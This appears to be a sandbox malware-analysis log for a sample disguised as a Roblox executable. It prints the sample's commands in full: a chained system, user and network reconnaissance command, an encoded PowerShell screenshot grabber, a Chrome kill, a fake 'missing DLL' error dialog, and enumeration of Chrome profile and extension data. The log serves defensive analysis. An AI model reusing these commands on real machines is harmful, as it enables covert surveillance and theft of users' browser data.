                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
                  Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                  Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAiAFMAeQBzAHQAZQBtAC4ARAByAGEAdwBpAG4AZwAiACkADQAKAGYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGUAZQBuAHMAaABvAHQAKABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdACQAYgBvAHUAbgBkAHMALAAgACQAcABhAHQAaAApACAAewANAAoAIAAgACAAJABiAG0AcAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAARAByAGEAdwBpAG4AZwAuAEIAaQB0AG0AYQBwACAAJABiAG8AdQBuAGQAcwAuAHcAaQBkAHQAaAAsACAAJABiAG8AdQBuAGQAcwAuAGgAZQBpAGcAaAB0AA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBHAHIAYQBwAGgAaQBjAHMAXQA6ADoARgByAG8AbQBJAG0AYQBnAGUAKAAkAGIAbQBwACkADQAKAA0ACgAgACAAIAAkAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoACQAYgBvAHUAbgBkAHMALgBMAG8AYwBhAHQAaQBvAG4ALAAgAFsARAByAGEAdwBpAG4AZwAuAFAAbwBpAG4AdABdADoAOgBFAG0AcAB0AHkALAAgACQAYgBvAHUAbgBkAHMALgBzAGkAegBlACkADQAKAA0ACgAgACAAIAAkAGIAbQBwAC4AUwBhAHYAZQAoACQAcABhAHQAaAApAA0ACgANAAoAIAAgACAAJABnAHIAYQBwAGgAaQBjAHMALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAJABiAG0AcAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA0ACgANAAoAJABiAG8AdQBuAGQAcwAgAD0AIABbAEQAcgBhAHcAaQBuAGcALgBSAGUAYwB0AGEAbgBnAGwAZQBdADoAOgBGAHIAbwBtAEwAVABSAEIAKAAwACwAIAAwACwAIAAxADkAMgAwACwAIAAxADAAOAAwACkADQAKACQAcABhAHQAaAAgAD0AIAAoAEcAZQB0AC0ASQB0AGUAbQAgAC4AKQAuAEYAdQBsAGwATgBhAG0AZQArACIAXABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AcABuAGcAIgANAAoAcwBjAHIAZQBlAG4AcwBoAG8AdAAgACQAYgBvAHUAbgBkAHMAIAAkAHAAYQB0AGgA
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand wwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqavwbpahqaaabqageacgb0agkayqbsae4ayqbtaguakaaiafmaeqbzahqazqbtac4arabyageadwbpag4azwaiackadqakagyadqbuagmadabpag8abgagahmaywbyaguazqbuahmaaabvahqakabbaeqacgbhahcaaqbuagcalgbsaguaywb0ageabgbnagwazqbdacqaygbvahuabgbkahmalaagacqacabhahqaaaapacaaewanaaoaiaagacaajabiag0acaagad0aiaboaguadwatae8aygbqaguaywb0acaarabyageadwbpag4azwauaeiaaqb0ag0ayqbwacaajabiag8adqbuagqacwauahcaaqbkahqaaaasacaajabiag8adqbuagqacwauaggazqbpagcaaab0aa0acgagacaaiaakagcacgbhahaaaabpagmacwagad0aiabbaeqacgbhahcaaqbuagcalgbhahiayqbwaggaaqbjahmaxqa6adoargbyag8abqbjag0ayqbnaguakaakagiabqbwackadqakaa0acgagacaaiaakagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoacqaygbvahuabgbkahmalgbmag8aywbhahqaaqbvag4alaagafsarabyageadwbpag4azwauafaabwbpag4adabdadoaogbfag0acab0ahkalaagacqaygbvahuabgbkahmalgbzagkaegblackadqakaa0acgagacaaiaakagiabqbwac4auwbhahyazqaoacqacabhahqaaaapaa0acganaaoaiaagacaajabnahiayqbwaggaaqbjahmalgbeagkacwbwag8acwblacgakqanaaoaiaagacaajabiag0acaauaeqaaqbzahaabwbzaguakaapaa0acgb9aa0acganaaoajabiag8adqbuagqacwagad0aiabbaeqacgbhahcaaqbuagcalgbsaguaywb0ageabgbnagwazqbdadoaogbgahiabwbtaewavabsaeiakaawacwaiaawacwaiaaxadkamgawacwaiaaxadaaoaawackadqakacqacabhahqaaaagad0aiaaoaecazqb0ac0asqb0aguabqagac4akqauaeyadqbsagwatgbhag0azqaraciaxabzagmacgblaguabgbzaggabwb0ac4acabuagcaiganaaoacwbjahiazqblag4acwboag8adaagacqaygbvahuabgbkahmaiaakahaayqb0agga"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand wwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqavwbpahqaaabqageacgb0agkayqbsae4ayqbtaguakaaiafmaeqbzahqazqbtac4arabyageadwbpag4azwaiackadqakagyadqbuagmadabpag8abgagahmaywbyaguazqbuahmaaabvahqakabbaeqacgbhahcaaqbuagcalgbsaguaywb0ageabgbnagwazqbdacqaygbvahuabgbkahmalaagacqacabhahqaaaapacaaewanaaoaiaagacaajabiag0acaagad0aiaboaguadwatae8aygbqaguaywb0acaarabyageadwbpag4azwauaeiaaqb0ag0ayqbwacaajabiag8adqbuagqacwauahcaaqbkahqaaaasacaajabiag8adqbuagqacwauaggazqbpagcaaab0aa0acgagacaaiaakagcacgbhahaaaabpagmacwagad0aiabbaeqacgbhahcaaqbuagcalgbhahiayqbwaggaaqbjahmaxqa6adoargbyag8abqbjag0ayqbnaguakaakagiabqbwackadqakaa0acgagacaaiaakagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoacqaygbvahuabgbkahmalgbmag8aywbhahqaaqbvag4alaagafsarabyageadwbpag4azwauafaabwbpag4adabdadoaogbfag0acab0ahkalaagacqaygbvahuabgbkahmalgbzagkaegblackadqakaa0acgagacaaiaakagiabqbwac4auwbhahyazqaoacqacabhahqaaaapaa0acganaaoaiaagacaajabnahiayqbwaggaaqbjahmalgbeagkacwbwag8acwblacgakqanaaoaiaagacaajabiag0acaauaeqaaqbzahaabwbzaguakaapaa0acgb9aa0acganaaoajabiag8adqbuagqacwagad0aiabbaeqacgbhahcaaqbuagcalgbsaguaywb0ageabgbnagwazqbdadoaogbgahiabwbtaewavabsaeiakaawacwaiaawacwaiaaxadkamgawacwaiaaxadaaoaawackadqakacqacabhahqaaaagad0aiaaoaecazqb0ac0asqb0aguabqagac4akqauaeyadqbsagwatgbhag0azqaraciaxabzagmacgblaguabgbzaggabwb0ac4acabuagcaiganaaoacwbjahiazqblag4acwboag8adaagacqaygbvahuabgbkahmaiaakahaayqb0agga
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()""Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "echo ####system info#### & systeminfo & echo ####system version#### & ver & echo ####host name#### & hostname & echo ####environment variable#### & set & echo ####logical disk#### & wmic logicaldisk get caption,description,providername & echo ####user info#### & net user & echo ####online user#### & query user & echo ####local group#### & net localgroup & echo ####administrators info#### & net localgroup administrators & echo ####guest user info#### & net user guest & echo ####administrator user info#### & net user administrator & echo ####startup info#### & wmic startup get caption,command & echo ####tasklist#### & tasklist /svc & echo ####ipconfig#### & ipconfig/all & echo ####hosts#### & type c:\windows\system32\drivers\etc\hosts & echo ####route table#### & route print & echo ####arp info#### & arp -a & echo ####netstat#### & netstat -ano & echo ####service info#### & sc query type= service state= all & echo ####firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand wwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqavwbpahqaaabqageacgb0agkayqbsae4ayqbtaguakaaiafmaeqbzahqazqbtac4arabyageadwbpag4azwaiackadqakagyadqbuagmadabpag8abgagahmaywbyaguazqbuahmaaabvahqakabbaeqacgbhahcaaqbuagcalgbsaguaywb0ageabgbnagwazqbdacqaygbvahuabgbkahmalaagacqacabhahqaaaapacaaewanaaoaiaagacaajabiag0acaagad0aiaboaguadwatae8aygbqaguaywb0acaarabyageadwbpag4azwauaeiaaqb0ag0ayqbwacaajabiag8adqbuagqacwauahcaaqbkahqaaaasacaajabiag8adqbuagqacwauaggazqbpagcaaab0aa0acgagacaaiaakagcacgbhahaaaabpagmacwagad0aiabbaeqacgbhahcaaqbuagcalgbhahiayqbwaggaaqbjahmaxqa6adoargbyag8abqbjag0ayqbnaguakaakagiabqbwackadqakaa0acgagacaaiaakagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoacqaygbvahuabgbkahmalgbmag8aywbhahqaaqbvag4alaagafsarabyageadwbpag4azwauafaabwbpag4adabdadoaogbfag0acab0ahkalaagacqaygbvahuabgbkahmalgbzagkaegblackadqakaa0acgagacaaiaakagiabqbwac4auwbhahyazqaoacqacabhahqaaaapaa0acganaaoaiaagacaajabnahiayqbwaggaaqbjahmalgbeagkacwbwag8acwblacgakqanaaoaiaagacaajabiag0acaauaeqaaqbzahaabwbzaguakaapaa0acgb9aa0acganaaoajabiag8adqbuagqacwagad0aiabbaeqacgbhahcaaqbuagcalgbsaguaywb0ageabgbnagwazqbdadoaogbgahiabwbtaewavabsaeiakaawacwaiaawacwaiaaxadkamgawacwaiaaxadaaoaawackadqakacqacabhahqaaaagad0aiaaoaecazqb0ac0asqb0aguabqagac4akqauaeyadqbsagwatgbhag0azqaraciaxabzagmacgblaguabgbzaggabwb0ac4acabuagcaiganaaoacwbjahiazqblag4acwboag8adaagacqaygbvahuabgbkahmaiaakahaayqb0agga"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new activexobject('wscript.shell'); sh.popup('the program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. try reinstalling the program to fix this problem', 0, 'system error', 0+16);close()"Jump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand wwbsaguazgbsaguaywb0agkabwbuac4aqqbzahmazqbtagiabab5af0aoga6aewabwbhagqavwbpahqaaabqageacgb0agkayqbsae4ayqbtaguakaaiafmaeqbzahqazqbtac4arabyageadwbpag4azwaiackadqakagyadqbuagmadabpag8abgagahmaywbyaguazqbuahmaaabvahqakabbaeqacgbhahcaaqbuagcalgbsaguaywb0ageabgbnagwazqbdacqaygbvahuabgbkahmalaagacqacabhahqaaaapacaaewanaaoaiaagacaajabiag0acaagad0aiaboaguadwatae8aygbqaguaywb0acaarabyageadwbpag4azwauaeiaaqb0ag0ayqbwacaajabiag8adqbuagqacwauahcaaqbkahqaaaasacaajabiag8adqbuagqacwauaggazqbpagcaaab0aa0acgagacaaiaakagcacgbhahaaaabpagmacwagad0aiabbaeqacgbhahcaaqbuagcalgbhahiayqbwaggaaqbjahmaxqa6adoargbyag8abqbjag0ayqbnaguakaakagiabqbwackadqakaa0acgagacaaiaakagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoacqaygbvahuabgbkahmalgbmag8aywbhahqaaqbvag4alaagafsarabyageadwbpag4azwauafaabwbpag4adabdadoaogbfag0acab0ahkalaagacqaygbvahuabgbkahmalgbzagkaegblackadqakaa0acgagacaaiaakagiabqbwac4auwbhahyazqaoacqacabhahqaaaapaa0acganaaoaiaagacaajabnahiayqbwaggaaqbjahmalgbeagkacwbwag8acwblacgakqanaaoaiaagacaajabiag0acaauaeqaaqbzahaabwbzaguakaapaa0acgb9aa0acganaaoajabiag8adqbuagqacwagad0aiabbaeqacgbhahcaaqbuagcalgbsaguaywb0ageabgbnagwazqbdadoaogbgahiabwbtaewavabsaeiakaawacwaiaawacwaiaaxadkamgawacwaiaaxadaaoaawackadqakacqacabhahqaaaagad0aiaaoaecazqb0ac0asqb0aguabqagac4akqauaeyadqbsagwatgbhag0azqaraciaxabzagmacgblaguabgbzaggabwb0ac4acabuagcaiganaaoacwbjahiazqblag4acwboag8adaagacqaygbvahuabgbkahmaiaakahaayqb0agga
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\_ssl.pyd VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\multidict VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop\roblox1.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop\roblox1.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\Desktop\roblox1.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\MonsterUpdateService\Monster.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f463e7a-ef1f-4e71-ae85-88471a72b3d6 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\az VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\ca VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\cy VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\da VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\et VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\onefile_1364_133790045022616316\stub.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformationJump to behavior
